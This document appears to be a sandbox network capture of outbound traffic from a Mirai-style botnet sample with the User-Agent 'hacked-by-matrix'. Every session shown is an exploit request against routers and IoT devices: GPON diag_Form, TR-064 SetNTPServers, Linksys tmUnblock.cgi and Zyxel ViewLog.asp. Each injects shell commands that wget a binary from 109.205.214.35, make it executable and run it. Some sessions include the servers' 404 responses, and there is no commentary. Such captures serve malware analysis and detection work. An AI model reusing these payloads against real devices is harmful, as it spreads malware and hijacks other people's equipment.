                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.1356362109.213.71.88443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540555954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.1352836118.205.35.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540586948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.13579685.149.68.156443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540622950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.13499845.94.230.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540622950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.1347202109.222.123.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540646076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.1355964212.73.123.190443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540678978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.1356632109.146.187.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540679932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.1336162212.23.108.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540694952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.136070241.239.119.397547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.595949888 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.1358004172.65.191.15855555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.670887947 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.1335346172.65.214.23655555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.670929909 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.1340754172.66.175.2488080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.798428059 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.1356354172.67.74.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.886502028 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.1360270213.91.154.6680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.907694101 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:30.108120918 CET987INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:30 GMT
                                                        Server: Apache/2.4.29 (Ubuntu)
                                                        Content-Length: 271
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 31 33 2e 39 31 2e 31 35 34 2e 36 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 305Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 213.91.154.66 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.1360292213.91.154.6680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.280539989 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:30.478466988 CET987INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:30 GMT
                                                        Server: Apache/2.4.29 (Ubuntu)
                                                        Content-Length: 271
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 31 33 2e 39 31 2e 31 35 34 2e 36 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 305Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 213.91.154.66 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.134526878.185.167.647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:30.288142920 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.514713049 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:22:30 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
